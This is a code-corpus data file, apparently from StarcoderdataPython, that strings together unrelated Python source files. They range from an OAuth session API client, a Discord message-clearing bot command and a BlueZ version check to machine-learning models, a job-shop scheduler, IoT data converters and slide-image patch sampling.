errors_mapping[('MISSING_INFORMATION', None)] = MissingInformation('The response from the OAuth provider is missing either the email, first_name or last_name fields')
errors_mapping[('NO_OAUTH', None)] = NoOauth('OAuth is not setup for the associated brand')
errors_mapping[('OTHER_OAUTH', None)] = OtherOauth('The user is already setup to OAuth via another vendor')
query_data = {
'api': self._api,
'url': '/session/oauth',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def oauth_token(
self,
client_id,
client_secret,
grant_type,
duration=None,
):
"""Oauth token.
:param client_id: The users email address
:param client_secret: The users password
:param grant_type: The grant type, set to client_credentials
:param duration: The number of seconds the token is valid for (optional and defaults to 3600 with a maximum value of 86400)
"""
request_data = {
'client_id': client_id,
'client_secret': client_secret,
'duration': duration,
'grant_type': grant_type,
}
errors_mapping = {}
errors_mapping[('AUTH_FAILED', None)] = AuthFailed('Authentication failed')
errors_mapping[('LOCKOUT', None)] = Lockout('Too many failed attempts')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
query_data = {
'api': self._api,
'url': '/session/oauth/token',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def pin(
self,
pin,
remember_device=None,
):
"""Pin.
:param pin: The PIN
:param remember_device: Remember the device as trusted. (optional)
"""
request_data = {
'pin': pin,
'remember_device': remember_device,
}
errors_mapping = {}
errors_mapping[('INVALID_PIN', None)] = InvalidPin('Invalid PIN')
errors_mapping[('INVALID_SID', None)] = InvalidSid('Invalid sid')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
errors_mapping[('PIN_EXPIRED', None)] = PinExpired('The PIN has expired')
query_data = {
'api': self._api,
'url': '/session/pin',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def sign(
self,
signature,
):
"""Sign.
:param signature: The Base64-encoded signature
"""
request_data = {
'signature': signature,
}
errors_mapping = {}
errors_mapping[('INVALID_SID', None)] = InvalidSid('Invalid sid')
errors_mapping[('INVALID_SIGNATURE', None)] = InvalidSignature('Invalid signature')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
query_data = {
'api': self._api,
'url': '/session/sign',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def ttl(
self,
):
"""Ttl.
"""
request_data = {
}
errors_mapping = {}
errors_mapping[('EXPIRED', None)] = Expired('Expired')
errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields')
query_data = {
'api': self._api,
'url': '/session/ttl',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
| StarcoderdataPython |
3259531 | import re
import subprocess
from ...exc import BleakError
def check_bluez_version(major: int, minor: int) -> bool:
"""
Checks the BlueZ version.
Returns:
``True`` if the BlueZ major version is equal to *major* and the minor
version is greater than or equal to *minor*, otherwise ``False``.
"""
# lazy-get the version and store it so we only have to run subprocess once
if not hasattr(check_bluez_version, "version"):
p = subprocess.Popen(["bluetoothctl", "--version"], stdout=subprocess.PIPE)
out, _ = p.communicate()
s = re.search(b"(\\d+).(\\d+)", out.strip(b"'"))
if not s:
raise BleakError(f"Could not determine BlueZ version: {out.decode()}")
setattr(check_bluez_version, "version", tuple(map(int, s.groups())))
bluez_major, bluez_minor = getattr(check_bluez_version, "version")
return bluez_major == major and bluez_minor >= minor
| StarcoderdataPython |
173031 | import datetime
from mantabot import command
class Clear(command.Command):
""" Bot command that deletes messages """
name = 'clear'
errors = {
'usage': '{name} <number>|<text>|me\n'
'→ *<number>*: clear that many messages.\n'
'→ *<text>*: clear all messages since that text last appeared.\n'
'→ me: clear all messages since last time you wrote.',
'permission_denied': 'I cannot manage messages in this channel.',
'not_found': 'I did not find that message in the last {limit} ones.',
'need_force': 'This is a lot of messages. Please confirm with `!{name} {number} force`.',
}
async def execute(self, message, args):
if len(args) == 0:
await self.error('usage', name=self.name)
elif len(args) == 1 or (len(args) == 2 and args[1].lower() == 'force'):
if args[0] == 'help':
await self.error('usage', name=self.name)
elif args[0] == 'me':
await self.self_clear(message)
else:
try:
number = int(args[0])
except ValueError:
await self.search_clear(message, args[0])
else:
if number < 100 or len(args) == 2:
await self.count_clear(message, number)
else:
await self.error('need_force', name=self.name, number=number)
else:
await self.search_clear(message, ' '.join(args))
async def clear_while(self, message, check, inclusive=False):
""" clear all messages until the check is false """
now = datetime.datetime.now().timestamp()
async with message.channel.typing():
to_delete = []
async for msg in message.channel.history(limit=100, before=message):
if now - msg.created_at.timestamp() >= 1209600:
break # cannot clear messages older than 14 days
if not check(msg):
if inclusive:
to_delete.append(msg)
break
to_delete.append(msg)
else:
return False
for idx in range(0, len(to_delete), 100):
await message.channel.delete_messages(to_delete[idx:idx+100])
return True
async def self_clear(self, message):
found = await self.clear_while(message, lambda msg: msg.author.id != message.author.id)
if not found:
await self.error('not_found', limit=100)
async def count_clear(self, message, number):
async with message.channel.typing():
await message.channel.purge(before=message, limit=number)
async def search_clear(self, message, text):
text = text.lower()
found = await self.clear_while(message, lambda msg: text not in msg.content.lower(), inclusive=True)
if not found:
await self.error('not_found', text=text, limit=100)
| StarcoderdataPython |
3235285 | # _*_ coding:utf-8 _*_
import tensorflow as tf
class Network:
r"""网络结构,2个隐藏层,1个输出层,第一个隐藏层有500个神经元,第二层有100个,输出层10个,并附带检验方法
学习率0.01
激活函数:Relu
损失函数:交叉熵
优化器:AdagradOptimizer(改良型梯度下降)
"""
def __init__(self,datasize:int,labelsize:int)->None:
r"""构造网络计算图,输入参数为训练集数据大小和对应标签(独热码)大小
"""
self.data_size = datasize
self.label_size = labelsize
# 定义全局训练步数
self.global_step = tf.Variable(0, trainable=False)
# 定义学习率
self.learning_rate = 0.01
# 使用占位符定义标签和训练集张量节点
self.x = tf.placeholder(tf.float32, [None,self.data_size])
self.y_ = tf.placeholder(tf.float32, [None, self.label_size])
# 占位符定义固化比例(在一次计算中按比例固化参数,一般用在全连接网络中,目的是一定程度上防止过拟合,固化比例为1-keep)
self.keep_prob = tf.placeholder(tf.float32)
# 定义各层参数张量节点,隐藏层初始随机数
w1 = tf.Variable(tf.truncated_normal([self.data_size,500],stddev = 0.1))
w2 = tf.Variable(tf.truncated_normal([500,100],stddev = 0.1))
w = tf.Variable(tf.zeros([100,self.label_size]))
# 定义各层偏置张量节点,偏置初始为0
b1 = tf.Variable(tf.zeros([500]))
b2 = tf.Variable(tf.zeros([100]))
b = tf.Variable(tf.zeros([self.label_size]))
# 定义计算节点,矩阵运算,激活函数为relu
a1 = tf.nn.relu(tf.matmul(self.x,w1)+b1)
a1_drop = tf.nn.dropout(a1,self.keep_prob)
a2 = tf.nn.relu(tf.matmul(a1_drop,w2)+b2)
a2_drop = tf.nn.dropout(a2,self.keep_prob)
# 定义输出层计算节点,使用softmax将结果映射到0-1之间的概率区间
self.y = tf.nn.softmax(tf.matmul(a2_drop, w) + b)
# 损失函数,使用交叉熵来表示运算结果与标签之间的差距
self.loss = tf.reduce_mean(-tf.reduce_sum(self.y_*tf.log(self.y),reduction_indices = [1]))
# 优化器使用改良型梯度下降方法,此方法可以自动调整学习率等参数
self.train = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss,global_step=self.global_step)
# 定义预测方法
self.predict = tf.equal(tf.argmax(self.y_, 1), tf.argmax(self.y, 1))
self.accuracy = tf.reduce_mean(tf.cast(self.predict, "float"))
| StarcoderdataPython |
1697788 | from sympy import symbols, sin, pi, latex
from ga import Ga
from printer import Format, xpdf
Format()
coords = (r, th, phi) = symbols('r,theta,phi', real=True)
sp3d = Ga('e_r e_th e_ph', g=[1, r**2, r**2*sin(th)**2], coords=coords, norm=True)
sph_uv = (u, v) = symbols('u,v', real=True)
sph_map = [1, u, v] # Coordinate map for sphere of r = 1
sph2d = sp3d.sm(sph_map,sph_uv)
print r'(u,v)\rightarrow (r,\theta,\phi) = ',latex(sph_map)
print 'g =',latex(sph2d.g)
F = sph2d.mv('F','vector',f=True) #scalar function
f = sph2d.mv('f','scalar',f=True) #vector function
print r'\nabla f =',sph2d.grad * f
print 'F =',F
print r'\nabla F = ',sph2d.grad * F
cir_s = s = symbols('s',real=True)
cir_map = [pi/8,s]
cir1d = sph2d.sm(cir_map,(cir_s,))
print 'g =',latex(cir1d.g)
h = cir1d.mv('h','scalar',f=True)
H = cir1d.mv('H','vector',f=True)
print r'(s)\rightarrow (u,v) = ',latex(cir_map)
print 'H =', H
print latex(H)
print r'\nabla h =', cir1d.grad * h
print r'\nabla H =', cir1d.grad * H
xpdf(filename='submanifold.tex',paper=(6,5),crop=True)
| StarcoderdataPython |
1764441 | from jssp_ga import jssp_instance
class Schedule:
def __init__(self, schedule, jssp_instance):
self.schedule = schedule
self.decomposed_tasks = self.decompose_tasks(jssp_instance)
self.task_durations = {}
self.get_task_times()
def __getitem__(self, index):
return self.decomposed_tasks[self.schedule[index]]
def decompose_tasks(self, jssp_instance):
decomposed_tasks = {}
for job in range(len(jssp_instance)):
for task in range(jssp_instance.number_of_machines):
current_task = jssp_instance[job][task]
preceeding_task = jssp_instance[job][task - 1]
job_machine_id = (job, current_task["machine_id"])
task_duration = current_task["duration"]
precedence = (job, preceeding_task["machine_id"])
if task == 0:
precedence = None
decomposed_task = {
"duration": task_duration,
"precedence": precedence,
}
decomposed_tasks[job_machine_id] = decomposed_task
return decomposed_tasks
def get_preceeding_task(self, task):
if self.decomposed_tasks[task]["precedence"] is None:
return (-1, -1)
else:
return self.decomposed_tasks[task]["precedence"]
def check_task_in_progress(self, task):
if task not in self.task_durations:
return {
"start_time": 0,
"duration": 0,
"end_time": 0,
}
else:
return self.task_durations[task]
def check_busy_machine(self, machine_id):
keys = [key for key in self.task_durations if key[1] == machine_id]
if not keys:
return [
{
"start_time": 0,
"duration": 0,
"end_time": 0,
}
]
else:
return [self.task_durations[key] for key in keys]
def get_last_machine_end_time(self, machine_tasks):
return max(task["end_time"] for task in machine_tasks)
def add_all_durations(self):
max_makespan = 0
for task in self.decomposed_tasks:
max_makespan += self.decomposed_tasks[task]["duration"]
return max_makespan
def get_task_times(self):
self.task_durations[self.schedule[0]] = {
"start_time": 0,
"duration": self[0]["duration"],
"end_time": 0 + self[0]["duration"],
}
for task in range(1, len(self.schedule)):
preceeding_task = self.get_preceeding_task(self.schedule[task])
preceeding_task_end_time = self.check_task_in_progress(preceeding_task)[
"end_time"
]
same_machine_jobs = self.check_busy_machine(self.schedule[task][1])
same_machine_last_end_time = self.get_last_machine_end_time(
same_machine_jobs
)
new_start_time = max(preceeding_task_end_time, same_machine_last_end_time)
task_duration = self[task]["duration"]
self.task_durations[self.schedule[task]] = {
"start_time": new_start_time,
"duration": task_duration,
"end_time": new_start_time + task_duration,
}
def calculate_makespan(self):
return max(
self.task_durations[key]["end_time"] for key in self.task_durations.keys()
)
| StarcoderdataPython |
1764110 | # Copyright 2021. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from time import time
from simplejson import dumps
from thingsboard_gateway.connectors.rest.rest_converter import RESTConverter, log
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
class JsonRESTUplinkConverter(RESTConverter):
def __init__(self, config):
self.__config = config
def convert(self, config, data):
datatypes = {"attributes": "attributes",
"timeseries": "telemetry"}
dict_result = {"deviceName": None, "deviceType": None, "attributes": [], "telemetry": []}
try:
if self.__config.get("deviceNameExpression") is not None:
dict_result["deviceName"] = TBUtility.get_value(self.__config.get("deviceNameExpression"), data, expression_instead_none=True)
else:
log.error("The expression for looking \"deviceName\" not found in config %s", dumps(self.__config))
if self.__config.get("deviceTypeExpression") is not None:
dict_result["deviceType"] = TBUtility.get_value(self.__config.get("deviceTypeExpression"), data, expression_instead_none=True)
else:
log.error("The expression for looking \"deviceType\" not found in config %s", dumps(self.__config))
except Exception as e:
log.error('Error in converter, for config: \n%s\n and message: \n%s\n', dumps(self.__config), data)
log.exception(e)
try:
for datatype in datatypes:
dict_result[datatypes[datatype]] = []
for datatype_config in self.__config.get(datatype, []):
value = TBUtility.get_value(datatype_config["value"], data, datatype_config["type"], expression_instead_none=True)
value_tag = TBUtility.get_value(datatype_config["value"], data, datatype_config["type"], get_tag=True)
key = TBUtility.get_value(datatype_config["key"], data, datatype_config["type"], expression_instead_none=True)
key_tag = TBUtility.get_value(datatype_config["key"], data, get_tag=True)
if ("${" not in str(value) and "}" not in str(value)) \
and ("${" not in str(key) and "}" not in str(key)):
is_valid_key = isinstance(key, str) and "${" in datatype_config["key"] and "}" in datatype_config["key"]
is_valid_value = isinstance(value, str) and "${" in datatype_config["value"] and "}" in datatype_config["value"]
full_key = datatype_config["key"].replace('${' + str(key_tag) + '}', str(key)) if is_valid_key else key
full_value = datatype_config["value"].replace('${' + value_tag + '}', value) if is_valid_value else value
if datatype == 'timeseries' and (data.get("ts") is not None or data.get("timestamp") is not None):
dict_result[datatypes[datatype]].append(
{"ts": data.get('ts', data.get('timestamp', int(time()))), 'values': {full_key: full_value}})
else:
dict_result[datatypes[datatype]].append({full_key: full_value})
except Exception as e:
log.error('Error in converter, for config: \n%s\n and message: \n%s\n', dumps(self.__config), str(data))
log.exception(e)
return dict_result
| StarcoderdataPython |
3276737 | from dataclasses import asdict, dataclass
from logging import Logger
from torch.optim.adam import Adam # pylint: disable=no-name-in-module
from src.core.common.checkpoint import Checkpoint
from src.core.waveglow.hparams import HParams
from src.core.waveglow.model import WaveGlow
@dataclass
class CheckpointWaveglow(Checkpoint):
# pylint: disable=arguments-differ
def get_hparams(self, logger: Logger) -> HParams:
return super().get_hparams(logger, HParams)
@classmethod
def from_instances(cls, model: WaveGlow, optimizer: Adam, hparams: HParams, iteration: int):
result = cls(
state_dict=model.state_dict(),
optimizer=optimizer.state_dict(),
learning_rate=hparams.learning_rate,
iteration=iteration,
hparams=asdict(hparams),
)
return result
| StarcoderdataPython |
3261706 | #!/usr/bin/env python
# -*- coding: utf-8 -*-#
#-------------------------------------------------------------------------------
# Name: main
# Description: the entrance of procedure
# Author: <NAME>
# Date: 2021/08/06
#-------------------------------------------------------------------------------
import _init_paths
from config import cfg, update_config
import argparse
from dataset import *
import os
from torch.utils.data import DataLoader
import torch
from train import train
def parse_args():
parser = argparse.ArgumentParser(description="Fine-tune CLIP with a medical dataset.")
# cfg
parser.add_argument(
"--cfg",
help="decide which cfg to use",
required=False,
default="/home/test.yaml",
type=str,
)
# GPU config
parser.add_argument('--seed', type=int, default=5
, help='random seed for gpu.default:5')
parser.add_argument('--gpu', type=int, default=0,
help='use gpu device. default:0')
args = parser.parse_args()
return args
if __name__ == '__main__':
data = cfg.DATASET.DATA_DIR
args = parse_args()
args.data_dir = data
# set GPU device
device = torch.device("cuda:" + str(args.gpu) if args.gpu >= 0 else "cpu")
update_config(cfg, args)
# Fixed random seed
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = True
# prepare the dataloader
train_dataset = ImageTextDataset("train", cfg)
train_loader = DataLoader(train_dataset, cfg.TRAIN.BATCH_SIZE, shuffle=True, num_workers=2, drop_last=True, pin_memory=True)
val_dataset = ImageTextDataset("val", cfg)
val_loader = DataLoader(val_dataset, cfg.TEST.BATCH_SIZE, shuffle=True, num_workers=2, drop_last=True, pin_memory=True)
# training phase
train(cfg, train_loader, val_loader, device)
| StarcoderdataPython |
1775544 | '''
Created on 19 fvr. 2019
@author: <NAME>
'''
class Mention:
'''
classdocs
'''
def __init__(self, name, context, e_type, sentence_words):
'''
Constructor
'''
self.name= name
self.context= context
self.e_type= e_type
self.sentence_words= sentence_words
| StarcoderdataPython |
195599 | #!/usr/bin/env python
# coding: utf-8
"""
Generate random data for your application
"""
import argparse, logging, importlib
from echolalia.generator import Generator
def add_args():
parser = argparse.ArgumentParser(
description='Generate random data for your application')
parser.add_argument('-w', '--writer', type=str, default='stdout')
parser.add_argument('-f', '--format', type=str, default='json')
parser.add_argument('-c', '--count', type=int, default=1)
parser.add_argument('-v', '--verbose', action='store_true')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-t', '--template', type=str)
group.add_argument('-i', '--items', type=str, action='append', metavar='KEY=VALUE')
return parser
def init_logging(verbose=False):
if verbose:
level = logging.DEBUG
else:
level = logging.ERROR
logging.basicConfig(
format='%(levelname)-9s %(funcName)s:%(lineno)d - %(message)s',
datefmt='%H:%M:%S',
level=level)
return logging.getLogger()
def main():
parser = add_args()
(args, _) = parser.parse_known_args()
writer = args.writer
formatter = args.format
mod = importlib.import_module('echolalia.writer.{}'.format(writer))
writer = mod.Writer()
parser = writer.add_args(parser)
mod = importlib.import_module('echolalia.formatter.{}er'.format(formatter))
formatter = mod.Formatter()
parser = formatter.add_args(parser)
args = parser.parse_args()
log = init_logging(verbose=args.verbose)
log.debug('Start')
template = args.template
count = args.count
if template is None:
log.debug('Generating {} docs with {} item(s)'.format(count, len(args.items)))
items = {}
for item in args.items:
kv = item.split("=", 1)
if len(kv) == 2:
items[kv[0]] = kv[1]
else:
items[item] = item
generator = Generator(items=items)
else:
log.debug('Generating {} docs with template {}'.format(count, template))
generator = Generator(template=template)
data = generator.generate(count)
log.debug('Marshalling with formatter "{}"'.format(args.format))
docs = formatter.marshall(args, data)
log.debug('Writing with writer "{}"'.format(args.writer))
writer.write(args, docs)
log.debug('Done')
parser.exit(status=0)
if __name__ == '__main__':
main()
| StarcoderdataPython |
3208192 | <reponame>Starrah/THU-SuperMoon
import os.path as osp
from itertools import product
from random import shuffle
import numpy as np
import openslide
from tqdm import tqdm
from scipy import ndimage
from skimage.filters import threshold_otsu
from skimage.morphology import dilation, star
BACKGROUND = 0
FOREGROUND = 1
def sample_patch_coors(slide_dir, num_sample=2000, patch_size=256):
slide = openslide.open_slide(slide_dir)
slide_name = osp.basename(slide_dir)
slide_name = slide_name[:slide_name.rfind('.')]
mini_frac = 32
mini_size = np.ceil(np.array(slide.level_dimensions[0]) / mini_frac).astype(np.int)
mini_level = get_just_gt_level(slide, mini_size)
mini_patch_size = patch_size // mini_frac
bg_mask = generate_background_mask(slide, mini_level, mini_size)
assert bg_mask.shape == (mini_size[1], mini_size[0])
# extract patches from available area
patch_coors = []
num_row, num_col = bg_mask.shape
num_row = num_row - mini_patch_size
num_col = num_col - mini_patch_size
row_col = list(product(range(num_row), range(num_col)))
shuffle(row_col)
cnt = 0
# attention center
H_min = int(np.ceil(mini_patch_size / 8))
H_max = int(np.ceil(mini_patch_size / 8 * 7))
W_min = int(np.ceil(mini_patch_size / 8))
W_max = int(np.ceil(mini_patch_size / 8 * 7))
# half of the center
th_num = int(np.ceil((mini_patch_size * 3 / 4 * mini_patch_size * 3 / 4)))
pbar = tqdm(total=num_sample)
for row, col in row_col:
if cnt >= num_sample:
break
mini_patch = bg_mask[row:row + mini_patch_size, col: col + mini_patch_size]
origin = (int(col * mini_frac), int(row * mini_frac), patch_size, patch_size)
if np.count_nonzero(mini_patch[H_min:H_max, W_min:W_max]) >= th_num:
# # filter those white background
# if is_bg(slide, origin, patch_size):
# continue
patch_coors.append(origin)
cnt += 1
pbar.update(1)
pbar.close()
return patch_coors
# get the just size that equal to mask_size
def get_just_gt_level(slide: openslide, size):
level = slide.level_count - 1
while level >= 0 and slide.level_dimensions[level][0] < size[0] and \
slide.level_dimensions[level][1] < size[1]:
level -= 1
return level
def generate_background_mask(slide: openslide, mini_level, mini_size):
img = slide.read_region((0, 0), mini_level, slide.level_dimensions[mini_level])
img = img.resize(mini_size)
bg_mask = threshold_segmentation(img)
img.close()
return bg_mask
# background segmentation algorithm
def threshold_segmentation(img):
# calculate the overview level size and retrieve the image
img_hsv = img.convert('HSV')
img_hsv_np = np.array(img_hsv)
# dilate image and then threshold the image
schannel = img_hsv_np[:, :, 1]
mask = np.zeros(schannel.shape)
schannel = dilation(schannel, star(3))
schannel = ndimage.gaussian_filter(schannel, sigma=(5, 5), order=0)
threshold_global = threshold_otsu(schannel)
mask[schannel > threshold_global] = FOREGROUND
mask[schannel <= threshold_global] = BACKGROUND
return mask
def is_bg(slide, origin, patch_size):
img = slide.read_region(origin, 0, (patch_size, patch_size))
# bad case is background
if np.array(img)[:, :, 1].mean() > 200: # is bg
img.close()
return True
else:
img.close()
return False
| StarcoderdataPython |
3233976 | <gh_stars>100-1000
# Copyright 2017, <NAME>, All rights reserved.
class AppError(Exception):
"""
Exception indicating an error
"""
pass
class ServiceExit(AppError):
"""
Custom exception which is used to trigger the clean exit
of all running threads and the main program.
"""
pass
class ServiceRestart(AppError):
"""
Exception indicating a restart is requested
"""
pass
| StarcoderdataPython |
1646535 | <reponame>SEQUOIIA/shipment-tracker
from sys import exit
class Provider:
def __init__(self):
self.name = ""
@staticmethod
def getProgress(shippingCode):
print("getProgress not implemented for provider yet.")
exit(1)
class ShipmentProgress:
def __init__(self):
self.status = []
self.packageID = ""
self.packageStatus = ""
def addStatus(self, status):
self.status.append(status)
def statusSize(self):
return len(self.status) | StarcoderdataPython |
3270816 | <filename>Engine/ScanRing.py
def ScanRing(RingPositions, HOOK_OPTION):
NoHasRing = [0, 0]
if HOOK_OPTION == 0:
import pyautogui
NoHasRing = pyautogui.locateOnScreen('images/PlayerStats/NoRing.png', confidence=0.9, region=(
RingPositions[0], RingPositions[1], RingPositions[2], RingPositions[3]))
if NoHasRing:
return True
else:
return False
elif HOOK_OPTION == 1:
from Engine.HookWindow import LocateImage
NoHasRing[0], NoHasRing[1] = LocateImage('images/PlayerStats/NoRing.png', Precision=0.9, Region=(
RingPositions[0], RingPositions[1], RingPositions[2], RingPositions[3]))
if NoHasRing[0] != 0 and NoHasRing[1] != 0:
return True
else:
return False
def SearchForRing(Ring, HOOK_OPTION):
FoundRing = [0, 0]
if HOOK_OPTION == 0:
import pyautogui
FoundRing = pyautogui.locateCenterOnScreen('images/Rings/' + Ring + '.png', confidence=0.9)
if FoundRing:
return FoundRing[0], FoundRing[1]
else:
return 0, 0
elif HOOK_OPTION == 1:
from Engine.HookWindow import LocateCenterImage
FoundRing[0], FoundRing[1] = LocateCenterImage('images/Rings/' + Ring + '.png', Precision=0.9)
if FoundRing[0] != 0 and FoundRing[1] != 0:
return FoundRing[0], FoundRing[1]
else:
return 0, 0
| StarcoderdataPython |
4814635 | """Contains utilities for handling dimensions."""
import logging
import math
from copy import deepcopy
from typing import Any, List, Optional, Tuple, TypedDict, Union
import numpy as np # type: ignore[import]
import pandas as pd # type: ignore[import]
CatBin = Union[str, pd.Interval]
def analyze_data_type(data_list: List[Any]) -> Tuple[List[Any], bool]:
"""Look at the data, remove any null-like values, sort, and tell if it's numerical."""
def is_nullish(val: Any) -> bool:
if isinstance(val, str):
return not bool(val) or str.isspace(val)
if isinstance(val, float):
return math.isnan(val)
return False
uniques = sorted({e for e in data_list if not is_nullish(e)})
is_numerical = isinstance(uniques[0], (float, int)) # sorted, so only need first
return uniques, is_numerical
class Dim:
"""Wraps a single dimension's metadata."""
def __init__(
self,
name: str,
catbins: List[CatBin],
is_10pow: bool = False,
is_discrete: bool = True,
) -> None:
self.catbins = catbins
self.name = name
self.is_10pow = is_10pow
if all(isinstance(c, pd.Interval) for c in catbins):
self.is_numerical = True
self.is_discrete = is_discrete
elif all(isinstance(c, str) for c in catbins):
self.is_numerical = False
self.is_discrete = True
else:
raise ValueError(f"Dim has invalid catbin type(s): {name=}, {catbins=}")
def __eq__(self, other: object) -> bool:
return (
isinstance(other, Dim)
and self.name == other.name
and self.catbins == other.catbins
)
def __repr__(self) -> str:
return f'Dim("{self.name}", #catbins={len(self.catbins)})'
@staticmethod
def from_pandas_df(
name: str, df: pd.DataFrame, num_bins: Optional[int] = None
) -> "Dim":
"""Factory from a pandas dataframe.
All intervals are left-inclusive: [a,b)
"""
is_10pow = False
def sturges_rule() -> int:
"""Use Sturges’ Rule, calculated by cardinality of set."""
return int(np.ceil(np.log2(len(df[name])) + 1))
def get_cut(num: int) -> List[pd.Interval]:
# print(max(values))
# print(min(values))
return list(
pd.cut(
np.linspace(min(unique_values), max(unique_values), num=num),
num,
include_lowest=True,
right=False,
)
)
def dist(one: int, two: int) -> float:
"""Get the "distance" between the two, calculated by degree of similarity."""
return max(one, two) / min(one, two)
# return np.abs(one - two) # type: ignore[no-any-return]
class TenPowException(Exception):
"""Raise when 10-Pow algo fails."""
def get_10pow() -> List[pd.Interval]:
logging.info(f"10^N Binning ({name})...")
sturges = sturges_rule()
# get starting power by rounding up "largest" value to nearest power of 10
largest_value = max(np.abs(max(unique_values)), np.abs(min(unique_values)))
power = int(np.ceil(np.log10(largest_value)))
prev = None
for power_offset in range(7): # 7; think: low-range high-value; 2000, 2001
width = 10 ** (power - power_offset)
temp = list(
pd.interval_range(
start=(min(unique_values) // width) * width, # 5278 -> 5000
end=max(unique_values) + width, # 6001 -> 7000
freq=width,
closed="left",
)
)
logging.debug(f"{sturges} vs {len(temp)} ({dist(len(temp), sturges)})")
# if new dist is now greater than last, use last
if prev and dist(len(temp), sturges) > dist(len(prev), sturges):
return prev
prev = temp
raise TenPowException()
def is_discrete_by_binning(num: int) -> bool:
"""If pd.cut() places multiple values in the same bin, then it's not discrete."""
print(pd.cut(unique_values, num, include_lowest=True, right=False))
return (
len(pd.cut(unique_values, num, include_lowest=True, right=False)) <= num
)
# get a sorted unique list w/o nan values
unique_values, is_numerical = analyze_data_type(df[name].tolist())
# Numerical
if is_numerical:
# use default # of bins
if not num_bins:
catbins = get_cut(sturges_rule())
# use 10-pow calculated bins
elif num_bins == -1:
try:
catbins = get_10pow()
is_10pow = True # only mark true if this algo works
except TenPowException:
catbins = get_cut(sturges_rule())
# use given # of bins
else:
catbins = get_cut(num_bins)
# Did the binning make this data effectively discrete?
is_discrete = is_discrete_by_binning(len(catbins))
# Categorical
else:
catbins = unique_values
is_discrete = True
logging.info(f"Cat-Bins: {catbins}")
return Dim(name, catbins, is_10pow, is_discrete)
class DimSelection:
"""A pairing of a Dim and a category/bin."""
def __init__(self, dim: Dim, catbin: CatBin, is_x: bool) -> None:
self.dim = dim
self.catbin = catbin
self.is_x = is_x
def __eq__(self, other: object) -> bool:
return (
isinstance(other, DimSelection)
and self.dim == other.dim
and self.catbin == other.catbin
and self.is_x == other.is_x
)
def get_pandas_query(self) -> str:
"""Get the pandas-style query string."""
if self.dim.is_numerical:
return (
f"{self.dim.name} {'>=' if self.catbin.closed_left else '>'} " # type: ignore[union-attr]
f"{self.catbin.left} and "
f"{self.dim.name} {'<=' if self.catbin.closed_right else '<'} "
f"{self.catbin.right}"
)
return f'{self.dim.name} == "{self.catbin}"'
def __repr__(self) -> str:
"""Get repr string."""
return f"DimSelection({self.dim=}, {self.catbin=}, {self.is_x=})"
class Intersection:
"""Wraps the intersection of n dimensions.."""
def __init__(self, dimselections: Optional[List[DimSelection]] = None) -> None:
if not dimselections:
dimselections = []
self.dimselections = dimselections
def deepcopy_add_dimselection(self, dimselection: DimSelection) -> "Intersection":
"""Deep-copy self then add the new DimSelection to a new Intersection."""
new = deepcopy(self)
new.dimselections.append(dimselection)
return new
def __eq__(self, other: object) -> bool:
return (
isinstance(other, Intersection)
and self.dimselections == other.dimselections
)
def __repr__(self) -> str:
return f"Intersection({self.dimselections})"
# ---------------------------------------------------------------------------------------
def super_len(dims: List[Dim]) -> int:
num = 1
for dim in dims:
num *= len(dim.catbins)
return num
class IntersectionMatrixBuildException(Exception):
""" "Raise when the IntersectionMatrix cannot be built correctly."""
class IntersectionMatrix:
"""Contains the 2D matrix of category combinations (intersections of multiple dimensions)."""
def __init__(self, x_dims: List[Dim], y_dims: List[Dim]) -> None:
self.matrix = self._build(x_dims, y_dims)
@staticmethod
def _build_list(x_dims: List[Dim], y_dims: List[Dim]) -> List[Intersection]:
"""Build out the 1D Intersection list."""
the_list: List[Intersection] = []
class DimXY(TypedDict): # pylint:disable=missing-class-docstring
dim: Dim
is_x: bool
def _recurse_build(
dims_togo: List[DimXY],
unfinished_intersection: Optional[Intersection] = None,
) -> None:
if not unfinished_intersection:
unfinished_intersection = Intersection()
if not dims_togo:
# intersection IS finished
the_list.append(unfinished_intersection)
return
for catbin in dims_togo[0]["dim"].catbins:
_recurse_build(
dims_togo[1:],
unfinished_intersection.deepcopy_add_dimselection(
DimSelection(dims_togo[0]["dim"], catbin, dims_togo[0]["is_x"])
),
)
y_dimxys: List[DimXY] = [{"dim": d, "is_x": False} for d in y_dims]
x_dimxys: List[DimXY] = [{"dim": d, "is_x": True} for d in x_dims]
_recurse_build(y_dimxys + x_dimxys)
return the_list
@staticmethod
def _build(x_dims: List[Dim], y_dims: List[Dim]) -> List[List[Intersection]]:
"""Build out the 2D Intersection matrix."""
# pylint:disable=invalid-name
x, y = 0, 0
x_range, y_range = range(super_len(x_dims)), range(super_len(y_dims))
matrix: List[List[Intersection]] = [
[Intersection() for x in x_range] for y in y_range
]
for intersection in IntersectionMatrix._build_list(x_dims, y_dims):
if x == len(matrix[0]):
x = 0
y += 1
matrix[y][x] = intersection
x += 1
if x != len(matrix[0]) and y != len(matrix) - 1:
raise IntersectionMatrixBuildException(
f"{len(matrix[0])}x{len(matrix)} matrix did not complete, "
f"last element: ({x=},{y=})"
)
return matrix
| StarcoderdataPython |
